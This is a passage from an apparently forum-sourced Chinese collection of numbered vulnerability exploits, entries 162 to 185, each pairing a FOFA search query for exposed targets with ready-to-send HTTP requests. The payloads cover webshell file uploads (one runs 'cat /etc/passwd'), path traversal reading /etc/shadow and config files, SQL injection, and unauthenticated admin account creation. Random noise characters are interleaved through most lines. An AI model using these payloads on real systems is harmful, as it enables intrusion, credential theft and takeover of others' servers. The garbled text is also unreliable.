$ O2 g3 s$ n" m<UploadResume xmlns="http://tempuri.org/">" n/ B: K [& j& W+ F1 t% S3 [; G
<ip>1</ip>- x _2 X1 N1 t2 a% h0 n
<fileName>../../../../dizxdell.aspx</fileName>
* S; v- a3 }' T& z<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>/ l3 |& _& |8 f B) V, J
<tag>3</tag>9 H, m' n* A8 ?0 Q
</UploadResume>
! e" Y8 D3 m: J* |8 O</soap:Body>
& x- d2 u/ A& j1 J7 K; o</soap:Envelope>
/ z5 I6 M, S/ ^" |
8 t1 b3 p/ l3 W/ H
2 \+ |/ s2 F- H& U% Vhttp://x.x.x.x/dizxdell.aspx ~* r, A, ^$ w# g5 Q8 u7 w
# R" V4 f' c9 _( b4 h162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
5 u7 d( Q+ _" b v PFOFA: app="和丰山海-数字标牌"
" S$ f. |2 S5 ]" [2 OPOST /QH.aspx HTTP/1.1! ?/ U5 a+ @" f2 U( y" C$ Z
Host: x.x.x.x, h/ h6 B% Q1 }: m6 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.07 \2 Q: B" E* |* |
Connection: close9 E+ V) c# G& J4 j8 S
Content-Length: 5837 N% }; y) x; Y. z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey9 w6 Y. d; P& Z+ N
Accept-Encoding: gzip
3 r* `. o2 g* f2 d3 C" ?9 f( Y; L* Q1 r: y1 m6 |
------WebKitFormBoundaryeegvclmyurlotuey- b) ~5 m1 R2 A, O8 b$ R
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
2 M; n8 Q# f) EContent-Type: application/octet-stream
: _) r/ u3 {1 K3 R
5 R' R% A2 D7 J* u% t<% response.write("ujidwqfuuqjalgkvrpqy") %>9 O$ v) h5 O" K5 X, h
------WebKitFormBoundaryeegvclmyurlotuey7 ^( U) h5 q/ t$ {! ^8 Q# V
Content-Disposition: form-data; name="action"$ r; \1 z) ]! m! w- O' n
: I8 \. m1 r$ r$ p% x
upload
! H# S) f+ Y( n9 o1 i------WebKitFormBoundaryeegvclmyurlotuey
5 H3 P8 ^" H* \5 S# AContent-Disposition: form-data; name="responderId"9 G* V9 B- a! z) S9 p# r% V
* d T! ~5 f$ c# Z* J
ResourceNewResponder
5 d! A% ?# r) |' B3 e------WebKitFormBoundaryeegvclmyurlotuey
# V5 S; G# A$ P3 }* ~) {Content-Disposition: form-data; name="remotePath"" r% `& R# Z. P' x
0 w z. m9 x h
/opt/resources
. o. t. Z& U% r! C! @1 L: c------WebKitFormBoundaryeegvclmyurlotuey--
6 g2 ?% @) y. Z& a1 A( {/ K
( H" ?& A* c( D2 M" F
! B4 @3 e4 X$ Y% }http://x.x.x.x/opt/resources/kjuhitjgk.aspx: D6 O: @: a: \ V4 m+ \
0 @& e/ v% b* Z0 v
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传' ]7 D# B- p2 G6 L5 |- Y
FOFA: icon_hash="-795291075"8 b1 g: n3 V6 }7 {( d) d
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
" f! {% c# {3 f3 UHost: x.x.x.x
& k( C2 G3 C! ~, vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
, `" X" R, U8 ~" ~Connection: close
. f3 S* _6 u4 S/ M4 cContent-Length: 293$ P' a2 q- i; t5 s
Accept: */*
: M6 g7 D' n# l' ZAccept-Encoding: gzip, deflate
( N; C+ a: c& WAccept-Language: zh-CN,zh;q=0.9
& Q1 B% |8 m1 P' SContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod8 h* m& j: ^: k% X* d
U: }3 P3 t, k6 E------iiqvnofupvhdyrcoqyuujyetjvqgocod& u* y4 @# \7 _& |; y7 a8 n+ [
Content-Disposition: form-data; name="name"2 \: W f1 z5 e5 y+ u+ R# j- C; s+ v
5 D$ \' A# x/ y) O0 z
1.php
" E% L0 K" v. \; R0 c; h------iiqvnofupvhdyrcoqyuujyetjvqgocod
, J0 L: I" q: n7 XContent-Disposition: form-data; name="upfile"; filename="1.php"2 b$ Q3 |7 W/ q. Z9 ]1 t
Content-Type: image/jpeg/ G0 y8 r( C- E4 U1 v
( } }; w6 c9 X5 Q9 Hrvjhvbhwwuooyiioxega
P5 K/ a* K) e! c, E& c" T' C------iiqvnofupvhdyrcoqyuujyetjvqgocod--
# J$ l& w2 P+ \0 Y0 u7 [6 j2 |) Q; ^. E3 u$ M+ v E) @
: M5 Z, A! {. U8 J
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 d0 S) |9 |5 O1 q) g0 T( b* d" pFOFA: title="智慧综合管理平台登入"
2 j" J! c; A7 I% B- S/ A U2 bPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
' n/ d4 o& q% u: q! RHost: x.x.x.x
; t. L+ f& H2 u a/ Y& ^; EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
8 `) F* K1 i" E! u- c/ qContent-Length: 288+ Q8 o( D3 p2 l* B. |
Accept: application/json, text/javascript, */*; q=0.01: N" \" l8 F0 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,/ E6 X# E) L3 n! F/ y1 ]0 {" q
Connection: close
0 E8 q) ~: O* E0 x8 a4 lContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
4 ?) `3 x' C/ y' `' W' mX-Requested-With: XMLHttpRequest! G/ h$ ]+ H6 f% M
Accept-Encoding: gzip; h$ X& [; ~* ^6 {, q0 Q
) }$ G9 A! _% G6 w n& n: B
------dqdaieopnozbkapjacdbdthlvtlyl" V. X' g5 k5 ]4 B
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"8 b) }, t L( l" u
Content-Type: image/jpeg2 d9 d" H6 {: m" j2 D0 e! n
{/ _' j2 T" S" z6 a3 |" r
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>9 s+ J- |; [( `
------dqdaieopnozbkapjacdbdthlvtlyl--- O$ c$ \5 X1 H% H. H
* r: I* }! [+ l7 V- _' [: m
2 J- | C% o7 I& T1 y% i8 ihttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx4 l5 L' D/ ]2 r* F' \
* r, X5 u. Y/ j7 n165. OrangeHRM 3.3.3 SQL 注入' c3 x$ y, @; h9 l
CVE-2024-36428
% _7 t6 s# Z8 R' V' S4 B+ \- VFOFA: app="OrangeHRM-产品"
$ U/ M( F/ z" t/ S# ~0 @$ fURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))9 h) I, m2 J6 `& X7 V) Q5 A
- L* P, K% V4 @( o
0 l, m' E5 ~" N4 C. Q, t% X3 c166. 中成科信票务管理平台SeatMapHandler SQL注入* r" A. P2 \1 N; \' J
FOFA:body="技术支持:北京中成科信科技发展有限公司"$ A, D- r q' ~" q# j" W1 d N
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.15 K6 r; F1 k) u
Host:! z# r+ g, t6 ?% T0 o
Pragma: no-cache9 c9 A# r5 V" L: v, U
Cache-Control: no-cache
4 E! b7 ]; w# UUpgrade-Insecure-Requests: 1
% q' n7 U* M. rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36- r* Q* ?$ V) h: l* d& l4 r3 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 _; M2 m8 |/ k9 F# U2 E& wAccept-Encoding: gzip, deflate- ]- V2 `8 \" Y. o& ?. g6 R& S
Accept-Language: zh-CN,zh;q=0.9,en;q=0.84 H+ ]+ v2 x9 n. F
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
- R; K% c0 O0 f& g5 D( K5 sConnection: close
8 t9 _2 W8 O1 b: {* w5 AContent-Type: application/x-www-form-urlencoded; |8 F: p/ ^3 \5 e: z" e7 P
Content-Length: 89' |* O9 v, ]/ I
% w4 R' e5 G3 Z% B
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
0 i* O% K2 a- [
& r: [6 M9 E& U/ n6 k* n, s. J1 d( B/ }$ X' p
167. 精益价值管理系统 DownLoad.aspx任意文件读取2 S; G+ B' {! ?: Y
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"5 I$ X% D2 u1 L8 E+ T6 g
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
' s( C# W+ C0 V! h# L6 tHost:
9 Z8 K2 R% p/ X8 W6 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ c7 H3 F6 A1 z$ @
Content-Type: application/x-www-form-urlencoded
! N4 a" a$ @; J" FAccept-Encoding: gzip, deflate
. r3 i. i+ u: s" j, aAccept: */*
$ g" v' M* N$ t& g6 x. PConnection: keep-alive0 |" u! S9 t. t
+ m0 q7 g& m/ V y
. A4 \, l- |! z" r ^
168. 宏景EHR OutputCode 任意文件读取
7 E+ Z% a2 j a1 GFOFA:app="HJSOFT-HCM"# D5 {: y: D0 z S, W& s2 h
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1+ w2 h% l t, G* [
Host: your-ip4 l! ]% O- ?' j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
) k$ ^6 w* D, x/ Q( O; VContent-Type: application/x-www-form-urlencoded! \" E2 Z) _% n% \
Connection: close; Z3 f0 Z6 f; Z( F6 c& `
P @+ z% _. v; i- k- B5 ?7 [3 g# D
6 W/ [) n! }' ~6 X: K3 s$ s4 c1 p
169. 宏景EHR downlawbase SQL注入
5 v% l3 Y# i' x1 r0 F$ }# mFOFA:app="HJSOFT-HCM"
7 o1 D+ J* }/ V& nGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
% F/ l( g$ R3 ]8 E# X4 v; UHost: your-ip# S& L. J" _7 z* ]1 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 f4 e0 X0 q% x" N& U) bAccept: */*
) P' Q7 E, v* V# B& ~8 kAccept-Encoding: gzip, deflate
! \8 C$ ^- K/ G5 L0 a* LConnection: close
+ g7 c& ^" n. G4 U. z4 k& r3 j8 _* ?" m/ `7 h
4 y9 g8 M a' ~5 c
1 Q; G3 U/ e' z170. 宏景EHR DisplayExcelCustomReport 任意文件读取- t1 R6 H$ U! L' X; D
FOFA:body="/general/sys/hjaxmanage.js"- J( \' ?2 t9 e0 K7 ]& W3 L
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.16 P& U: z: H @% W u: F
Host: balalanengliang
& `0 v8 `/ ] ] p6 V. m4 H& O1 v0 E, wUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 C U. N4 Q# W! K9 C& \0 tContent-Type: application/x-www-form-urlencoded, [& S3 c. a! E5 N! d' F8 @+ o
4 @; ~) r5 [" e7 F8 w$ P. L- H. ufilename=../webapps/ROOT/WEB-INF/web.xml- X' I a- q1 [' a- A6 d/ q; m
" J4 F: Q. Q8 @6 [2 @4 `+ R" Q8 A4 J# r
171. 通天星CMSV6车载定位监控平台 SQL注入0 D5 W; n. E' w( }8 M( b
FOFA:body="/808gps/"
# A& w7 Z$ ~0 y' v- kGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1) \' z2 N1 I/ m4 g. `2 K- E" v9 d
Host: your-ip1 d/ f2 E% F' c9 e- ^4 N# G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0" {4 y$ _( n& ~% e
Accept: */*
( [$ L1 s; z4 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ C+ }0 }1 b0 m7 c
Accept-Encoding: gzip, deflate& a9 H; v3 l1 O/ j e5 E
Connection: close
2 m3 r U1 G) m7 ^+ i/ V0 [$ z+ _+ O- H. |
7 @+ V$ u6 i* S+ K# }4 `
4 ^: J7 ?4 Y6 ~) Z- k( }2 F
172. DT-高清车牌识别摄像机任意文件读取
- q, Z2 ?$ W4 U# g% X% m/ M' ^FOFA:app="DT-高清车牌识别摄像机"
" L* E6 s2 o7 ^2 _: V ?GET /../../../../etc/passwd HTTP/1.1
3 u! R: L$ s, {: X" ]4 U2 a4 tHost: your-ip
/ n- I/ v: f' [$ J& N) @$ u( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- H* q0 ^1 b% fAccept-Encoding: gzip, deflate" ~! H( v8 T. J% `' |& J
Accept: */*
. l6 w, \4 y4 l; jConnection: keep-alive
0 R4 O9 U% d7 O i2 R8 Z- }, ~+ K; O6 c6 D" _
3 G% U" _* N# D9 R
" r8 [* @9 m W5 `* r3 ^7 w. G. H173. Check Point 安全网关任意文件读取
7 ~( i7 J: |4 z0 n8 d3 DCVE-2024-24919
9 b7 Q% u) A4 T6 k$ J7 @FOFA:app="Check_Point-SSL-Network-Extender"
7 ]4 } K2 ^- Q$ l/ M' H0 z! lPOST /clients/MyCRL HTTP/1.1, F4 v# z5 \6 p- @$ K
Host: your-ip
# O$ i1 `- a( r! ^# w* n8 @6 `Content-Type: application/x-www-form-urlencoded6 E6 j) ~5 X8 N T9 f
( O& {: @; k5 B5 k t1 Q0 p& u
aCSHELL/../../../../../../../etc/shadow
0 u. o. ~9 y0 {( ]& \" k8 M
; U6 O& W5 D& L. o8 t( ?
& s$ U( p$ {+ z; o7 k
* t: E) x0 ~: e/ C% o174. 金和OA C6 FileDownLoad.aspx 任意文件读取% h& A% s% Y2 g* e
FOFA:app="金和网络-金和OA", d7 D+ O, ]" C/ S$ `- V; q' X
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
/ y$ ^1 L4 Y7 l7 G- ]Host: your-ip X0 x2 m1 O3 V! C' R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. V, {* Z) w& c( o' f; s' ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; p, Y. K; T0 O8 J# p' K2 RAccept-Encoding: gzip, deflate, br
+ H2 J) a9 J& }) kAccept-Language: zh-CN,zh;q=0.9
: U# p: s+ J% s0 KConnection: close
/ m! s5 p. r/ x% B
( `3 M8 d9 n+ Y1 M1 Z( ]- P3 G1 M4 v1 g9 v M
. [, P. `4 k1 v' D
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入; n/ _6 J: C+ w4 I+ g, o3 ]8 V
FOFA:app="金和网络-金和OA"6 z: s8 W! s) A7 b- s
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.14 S8 K& `! x$ t: c
Host:
& H/ p" B4 t. CUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ }2 y, Y. X; e1 |1 X2 a e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ b7 l' v6 v. D, O4 H4 N' V- EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 `8 Q6 h6 o! R% |
Accept-Encoding: gzip, deflate
. G! B6 x& G) {+ tConnection: close
9 s6 E7 Q# J( x. b1 Z" hUpgrade-Insecure-Requests: 1
/ r+ H( H/ y5 W+ }$ U7 [- Y# L" Q1 ^. X. _
) Y; a% Z9 O1 m3 a: W
176. 电信网关配置管理系统 rewrite.php 文件上传
9 g2 K1 m0 z) Z" |FOFA:body="img/login_bg3.png" && body="系统登录"
. i' O( ]# W8 s5 K* fPOST /manager/teletext/material/rewrite.php HTTP/1.1
2 J c( T6 j8 W/ v& qHost: your-ip( K4 z$ j' Y$ S+ C! G# r6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- s/ f5 E& T' q% O' c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT! c4 H# {0 u" L
Connection: close7 D/ y d/ ]$ `* M
9 Y8 p, L) H9 p; F------WebKitFormBoundaryOKldnDPT$ N( p( c8 }; L( f4 F
Content-Disposition: form-data; name="tmp_name"; filename="test.php"& D. r( W' n) ~8 `* _
Content-Type: image/png
6 w5 K( j" ^3 h9 J9 K' p 7 V( n2 h5 l! s4 r5 O3 X* y7 V0 N
<?php system("cat /etc/passwd");unlink(__FILE__);?># b( g, C$ K+ m6 | Q& f4 w4 h. y
------WebKitFormBoundaryOKldnDPT0 r5 F8 ~4 \8 B
Content-Disposition: form-data; name="uploadtime"
" \, ]& A. _; c# p. ]# U4 X & O3 X6 F2 m( V9 t: L
" N0 N& U" T! g+ P2 s% x9 M; v* h------WebKitFormBoundaryOKldnDPT--6 B. _+ W/ \. B0 u; w. R8 y
. d9 O! s$ F5 H
5 Y2 u4 g! H$ D7 A7 } F* @1 b0 d) ^* i( y! I( _1 R2 g0 S( |: b8 v
177. H3C路由器敏感信息泄露
7 ^+ z$ |' }7 Y' B: m4 K( p9 m2 k% a# I/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
. }& ^: T5 R1 C7 Q9 c+ L3 ^1 ~/userLogin.asp/../actionpolicy_status/../M60.cfg
$ n! S3 j9 } K9 X6 R+ o( t6 r% L9 [/userLogin.asp/../actionpolicy_status/../GR8300.cfg
9 h* a" n& g3 s0 w- u, J( ^/userLogin.asp/../actionpolicy_status/../GR5200.cfg
" x. b# r0 v+ H& H! m/userLogin.asp/../actionpolicy_status/../GR3200.cfg/ ^/ z5 I3 P3 s: P0 ^5 X
/userLogin.asp/../actionpolicy_status/../GR2200.cfg( n% ?3 g6 r1 n. t% f) Q( S$ b, M) r
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
" R) C: y& U6 I8 u+ M' ]1 j/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg0 N# o4 C2 \* i! R3 F" i: M
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg# _" Y4 {- h8 C5 \1 Y# h
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg9 j# K+ g( F _" Z+ U/ J
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
- t0 r8 R' l0 v W/userLogin.asp/../actionpolicy_status/../ER5100.cfg, s8 d0 g- W. a
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
( d' h# ~1 N3 L+ p& p/userLogin.asp/../actionpolicy_status/../ER3260.cfg
( b, E/ ]: N8 N, D: K/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
: l; n* V+ P6 @* {- I0 z9 n/userLogin.asp/../actionpolicy_status/../ER3200.cfg8 u9 f6 a/ d; q5 m K' \( f3 A; `/ K
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
( A' [; }8 c7 k4 |/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
9 o( r$ m5 U3 J6 n/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
% g& i- p8 j( m6 _& N) w4 C/userLogin.asp/../actionpolicy_status/../ER3100.cfg6 \# K$ R$ C8 U# ?+ r* J, f
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg" t& s3 X: \% X0 z, R: \( {
8 }3 E' `+ F+ t+ Y- Z& `) W9 M( j$ W. {
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
3 {% }4 t) o; i& ^0 P- y: JFOFA:header="/selfservice"
) o4 l2 G R8 p# UPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
3 r* Y1 X" N8 x8 `5 n2 U6 V# x, i7 PHost:* k4 Y0 J; c0 A! I; t2 ?3 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# ^, m# x9 n! U( q! O
Content-Length: 252
- }" o- t9 R5 h2 k2 f8 a3 `Accept-Encoding: gzip, deflate- S) G8 S6 G* b( x3 O3 P: \
Connection: close
2 ?' j. ]: `4 W* b% K2 M/ ]Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l" ~2 A' ~$ o0 l9 O- ^5 Y: S
-----------------aqutkea7vvanpqy3rh2l
1 Y+ |8 F7 d) O" [$ X8 ^Content-Disposition: form-data; name="12234.txt"; filename="12234"
$ N, w( r8 f2 [5 a5 |- y/ i" oContent-Type: application/octet-stream
0 z3 j* w! @' C: h. `Content-Length: 2558 r) y) Q+ L5 @
# [/ `( T0 z. a1 Z" X0 C: W# N12234# ~2 Z. U% R/ B/ U: V
-----------------aqutkea7vvanpqy3rh2l--' }9 N; s, p: C$ z9 C8 D
: |5 ]( Y G% r% z7 x% K
3 G. M5 S3 W" f: e) w9 o8 r1 v$ a' p% _' O
GET /imc/primepush/%2e%2e/flex/12234.txt
, E2 M3 d9 u+ t1 w5 i, _+ i! t( ?* j h. n. x
+ c' }" |: G- w179. 建文工程管理系统存在任意文件读取
$ {* e" K2 S; W% o; y% s' bPOST /Common/DownLoad2.aspx HTTP/1.1
, P# e9 D$ _% OHost: {{Hostname}}
0 `1 v& L1 R( i0 A# aContent-Type: application/x-www-form-urlencoded
' I* l( Z7 C) C' j. I. ?User-Agent: Mozilla/5.06 `7 W1 @' C! s# d% V
; _! z" P; R% v# dpath=../log4net.config&Name=
1 D9 Q; J) F' V8 G
% k3 ^, V% S5 E
7 S9 T H2 G4 ?6 e8 o+ I4 d) q3 h% q180. 帮管客 CRM jiliyu SQL注入
' Y& K# O: K1 O. i5 [3 p9 y5 |FOFA:app="帮管客-CRM"
7 j- V' k5 X1 j4 j& C& n; wGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.13 w' r* N- q4 V: P
Host: your-ip3 l, Y( V) b* O' a- e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ R/ G; C$ F ]" v9 c& yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" M+ q. P. ]$ ~: S/ X
Accept-Encoding: gzip, deflate* S( a9 g( E' E) R
Accept-Language: zh-CN,zh;q=0.9; _1 i/ b) v3 _7 z0 Q# V2 i, m4 G2 {
Connection: close) A6 B) Q6 |2 |' N( p2 ^; e
" i8 M" r J0 U7 H6 ]" @- }; N& e! f" R, R# T+ h% X% h( p
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入0 @* u# q0 m) w6 v1 m2 h! c
FOFA:"PDCA/js/_publicCom.js"3 `6 `6 j) g6 r7 I5 t7 s, M' R
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.11 J; k& z! I7 F+ R- l1 F
Host: your-ip
2 u7 _+ T$ x' l5 M, DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' Q5 ~" c. X* |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 H3 R2 r* K% x% o* I; e7 A/ U, eAccept-Encoding: gzip, deflate, br
- ^! N- d. Q% Q5 _Accept-Language: zh-CN,zh;q=0.9
. k* T+ e( P8 |4 sConnection: close
+ I9 T0 A8 t6 s4 {2 j3 J8 ?0 zContent-Type: application/x-www-form-urlencoded
9 { K6 g. \% O9 O* o& X& q3 Z- ~) _, Y, p v- K, `. H [
. H% m! K: [) a0 @2 w, d( q7 Xaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
% C3 o$ o- c. s% ^) P$ k1 @: H: u8 G4 z7 s {
) F4 X: j. d" @1 U; O; {! t
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
I, c) |+ |6 M R& Q8 R2 C3 aFOFA:"PDCA/js/_publicCom.js"0 ?8 D0 m$ \) M5 t2 i: {/ a* M$ Y2 y
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1 B) A! ]- I; [" l1 M% [
Host: your-ip
F8 N7 C3 |2 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36+ a9 U* F8 l; W5 Z" H1 O# C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 _: v3 b4 s( s
Accept-Encoding: gzip, deflate, br
) R5 S) g5 L. l1 zAccept-Language: zh-CN,zh;q=0.90 S6 M$ h+ d: X1 i3 p
Connection: close7 |' O& S+ z8 d7 U5 \0 G, ]
Content-Type: application/x-www-form-urlencoded
d* [0 W8 E, f; N/ f, @7 O
* I+ s& M* ?, u2 J, f) [/ V% Q- r6 a0 V% o+ E
username=test1234&pwd=test1234&savedays=1
/ [" u, i0 w/ T9 ]8 o5 |7 `3 V ^5 Z3 [0 n- o* K
c; V# ]* |. \2 c+ Q7 ^
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. W7 X: E1 O& q. O
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
& t, F* G$ u5 W2 u" k1 iGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1) T) [ j: g- }# \' n
Host: your-ip
8 ~) k9 Q( X, PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 b) h& Y: E' Y) e# v& y8 X
Accept-Charset: utf-8
8 U! \" v" v3 lAccept-Encoding: gzip, deflate" P% {7 S5 H4 L2 c/ x5 E5 e
Connection: close* i) C- |. o. m% \; P" I
4 _- h% U, O" ~) H) C4 G1 h
+ c/ h$ X9 n" o! t; b! N7 r/ @' T184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加/ X! K3 `; F7 G. H
FOFA:server="SunFull-Webs"
- O4 u9 @" z4 G9 V& bPOST /soap/AddUser HTTP/1.18 D# M3 J6 A/ e$ w! S. \4 k( O: P
Host: your-ip
) d* h4 P! W1 \- pAccept-Encoding: gzip, deflate
, l4 A% k0 d7 N/ Q2 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Q. x1 T& [, {Accept: application/xml, text/xml, */*; q=0.019 _* ^# f# t2 ~
Content-Type: text/xml; charset=utf-8
+ r$ G# D) Z: h4 [) hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* k2 C' i; K- {- P; k
X-Requested-With: XMLHttpRequest
! `9 _/ f p7 j: N: D" |- w3 h1 |4 o, `" a/ D) {7 {) b
) Q" V, y% M+ f' T* }0 {- qinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
! |+ ?# Q g6 n# \; Z# ], a5 c7 g* }4 L/ V+ d
: B! U5 W4 L- ]3 p
185. 瑞友天翼应用虚拟化系统SQL注入1 T; T9 Y2 O' ^) o2 k& j' V! {9 H. [
version < 7.0.5.1
$ L% u, I3 E6 U, ~FOFA:app="REALOR-天翼应用虚拟化系统") [3 u O6 u! F/ u3 e
